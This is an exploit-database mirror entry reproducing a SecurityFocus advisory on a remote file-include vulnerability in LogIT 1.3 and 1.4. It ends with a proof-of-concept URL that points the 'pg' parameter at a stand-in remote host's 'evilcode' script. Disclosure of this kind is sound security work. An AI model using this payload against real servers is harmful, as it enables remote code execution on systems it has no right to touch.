exploit-db-mirror/exploits/php/webapps/27345.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

9 lines
No EOL
633 B
Text

source: https://www.securityfocus.com/bid/16932/info
LogIT is prone to a remote file-include vulnerability. This issue is due to the application's failure to properly sanitize user-supplied input.
Attackers may specify remotely hosted script files to be executed in the context of the webserver hosting the vulnerable software. An attacker can exploit this issue to execute arbitrary remote PHP code on an affected computer with the privileges of the webserver process.
LogIT versions 1.3 and 1.4 are affected by this vulnerability; other versions may also be affected.
http://www.example.com/?pg=http://www.example2.com/evilcode